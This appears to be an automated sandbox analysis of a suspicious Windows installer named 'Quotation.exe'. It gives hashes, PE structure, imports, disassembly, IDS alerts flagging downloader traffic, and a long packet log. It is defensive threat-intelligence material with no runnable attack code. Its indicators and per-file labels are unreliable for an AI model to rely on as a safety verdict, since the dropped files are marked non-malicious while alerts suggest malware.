MD5:	0B62328C4966F6B879B3C13B7FBD9C0D
SHA1:	6DD81F12E739E81E06778067513ED1178A06AFC9
SHA-256:	645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
SHA-512:	2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
Malicious:	false
Preview:	.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................\|............................................................[.................................................\.......................v...........o...................................m...........

C:\Users\user\overlays\besvangredes\Revolutionsraadets.Bim

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	149107
Entropy (8bit):	4.608068435200046
Encrypted:	false
SSDEEP:	3072:sTyvrYiIBN1I+3nMEIg9Hkb5pn4ItMwcyo8uO:OqrdIr7XbJWz48uO
MD5:	ED9C3E5E3DEA88C54708F64FFA3CEFBC
SHA1:	2331CAB7644ADAF10C0614EDD529B951FE893929
SHA-256:	CB82D952004AFD4E0673B0948FD9F283EDCE71D413E8B3C1AC31D0D9C9C5ADB5
SHA-512:	0CE07A554CA33A61586FCB6757E83F947D2B259D6A8DD976234AEBF1A5D577C7BA81D0DC04AA9B912C01BDC1222EC5A403D5AB2DD668630E8F028CA904F6828D
Malicious:	false
Preview:	.....<<...........t........................>............J..............I..kkkk..........,.......)...JJ.....q..........N.....%%%.PPP.............................``.............&&&&&&&.2.g......#...........@@....q......h...........3......E.......66.. ........... .--........vv..............'......o................_..........P..=........t.J....o...............................................?......[.%%..55...................................Y......i......''''.......aaaa......)..............................q...<.{..........l..................y...5............HH...............mm.............__....b...i.3.......KKK........n..i...'.l..........sss.......$$$......[..ee..............................'..\|...............qq..............,,...................../...b.......#...l...ttt..............=......g...........F.mm...."...^..........oo.."......`................................iii.......OO.......................0..y...4........................zz.........+++.PP..c.........ZZZZ.G....>..^^^..)...(....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.812324528064551
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quotation.exe
File size:	1'196'832 bytes
MD5:	5bdcc2d33ca974c1d8448afcf83f74d1
SHA1:	f693dea01991d995173a5934d478ad43c50e28e2
SHA256:	4ad4bb99aa68ac6d5828c71c3f3d5d2983ead0626fd77aba7bb98de727a4b90b
SHA512:	35633187911d09542892a55671ce6d2953418466185b57aa506fabf039c97a7375c8ad4268f3ded8f9fe5bb7a36a3c688d2321056b7c0aff3546a630df30bbbf
SSDEEP:	24576:X4nhDoAFnNn+rb27TGQwpoxmBNFt/ZNXLGQ7WczkxFnfbP9:X+hkSNwbwGlym5tBNXKQKczg
TLSH:	4A4523297692C08BE94257384EF7E37ADA7DED013C25916773303B4EAD7528CDE8A610
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.

File Icon


Icon Hash:	873335651170390f

Static PE Info

General

Entrypoint:	0x4036da
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=pgntt, O=pgntt, L=Sainte-Menehould, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	05/09/2024 09:34:43 05/09/2027 09:34:43
Subject Chain	CN=pgntt, O=pgntt, L=Sainte-Menehould, C=FR
Version:	3
Thumbprint MD5:	C83ED018C13F0E1F78CAD29D0DE65332
Thumbprint SHA-1:	F638CA280DC804CB2077BA6EAC3F71B87E5BECDC
Thumbprint SHA-256:	E4658D82F4727F4C515694D57CEC113E852D7A1FA832B57D1A41C15C37F88C59
Serial:	64418F2BCCA72420321A8611600BB9F9160A2B14

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F00F52441E9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F00F52441C3h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F00F52441BDh
xor eax, eax
jmp 00007F00F52441A4h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F00F52441BDh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F00F52441B6h
mov eax, dword ptr [esp+38h]
mov dword ptr [007A8638h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3db000	0x3e910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x123128	0x11f8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c0b	0x6e00	9178309eee1a86dc5ef945d6826a6897	False	0.6605823863636363	data	6.398414552532143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	0885e83a553c38819d1fab2908ca0cf5	False	0.4307391826923077	data	4.86610208699674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e640	0x200	5c0f03a1a77f205400c2cbabec9976c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3db000	0x3e910	0x3ea00	2690c3c0c1de505f961321c7e2d6da34	False	0.6915076097804391	data	6.574790239627466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3db388	0x16482	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000394451383867
RT_ICON	0x3f1810	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.486498876138649
RT_ICON	0x402038	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5308492747529956
RT_ICON	0x40b4e0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5497227356746766
RT_ICON	0x410968	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5415682569674067
RT_ICON	0x414b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5884854771784233
RT_ICON	0x417138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6179643527204502
RT_ICON	0x4181e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6668032786885246
RT_ICON	0x418b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_DIALOG	0x418fd0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4190d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4191f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4192b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x419318	0x84	Targa image data - Map 32 x 25730 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x4193a0	0x220	data	English	United States	0.5110294117647058
RT_MANIFEST	0x4195c0	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5529131985731273

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T11:48:51.460958+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49705	TCP
2024-11-11T11:49:29.254638+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49712	TCP
2024-11-11T11:50:07.152121+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49868	142.250.186.78	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 11:50:06.154162884 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.154210091 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.154288054 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.165528059 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.165546894 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.763602972 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.763680935 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.764764071 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.764812946 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.870342970 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.870363951 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.870748043 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:06.870837927 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.874968052 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:06.919325113 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:07.152110100 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:07.155478954 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:07.155495882 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:07.159461021 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:07.159544945 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:07.159595966 CET	443	49868	142.250.186.78	192.168.2.9
Nov 11, 2024 11:50:07.159672976 CET	49868	443	192.168.2.9	142.250.186.78
Nov 11, 2024 11:50:07.185908079 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.185950041 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:07.186132908 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.186393976 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.186404943 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:07.780504942 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:07.780579090 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.834254980 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.834284067 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:07.834803104 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:07.834865093 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.835457087 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:07.883333921 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.342187881 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.342328072 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.347577095 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.347687960 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423110008 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423166990 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423192978 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423198938 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423213005 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423226118 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423240900 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423248053 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423274040 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423316956 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.423326015 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.423422098 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.425390005 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.427448988 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.427454948 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.429740906 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.431745052 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.435461044 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.435467958 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.435513020 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.437169075 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.439450026 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.439457893 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.442004919 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.443536043 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.443583965 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.443589926 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.447442055 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.449096918 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.450031042 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.450040102 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.450078011 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.454821110 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.455449104 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.455460072 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.459455013 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.460741997 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.462012053 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.462030888 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.462666035 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.504301071 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.504375935 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.504409075 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.504441023 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.504457951 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.504492044 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.504507065 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.504533052 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.505075932 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.505127907 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.505228043 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.505271912 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.505274057 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.505286932 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.505311012 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.505337000 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.505343914 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.505378008 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.506033897 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.506521940 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.506551027 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.506567955 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.506576061 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.506592989 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.506607056 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.506779909 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.506829023 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.506839991 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.507790089 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.512450933 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.512506008 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.512558937 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.512567043 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.512651920 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.513304949 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.513397932 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.513406038 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.513452053 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.518399954 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.518467903 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.518476009 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.521022081 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.521080017 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.521087885 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.521761894 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.524873972 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.525571108 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.525578976 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.525629997 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.528701067 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.528764009 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.528772116 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.529830933 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.532634974 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.533359051 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.533369064 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.533435106 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.536211967 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.537554979 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.537563086 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.537606001 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.540241957 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.540319920 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.540327072 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.540364027 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.543845892 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.545495033 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.545505047 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.547750950 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.547816992 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.547830105 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.549474001 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.551551104 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.553502083 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.553512096 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.553555965 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.585405111 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585478067 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585508108 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585546017 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585577965 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585592031 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.585609913 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.585643053 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.585654020 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586070061 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586117983 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586123943 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586134911 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586162090 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586189032 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586460114 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586510897 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586538076 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586560965 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586569071 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586580038 CET	49877	443	192.168.2.9	172.217.18.1
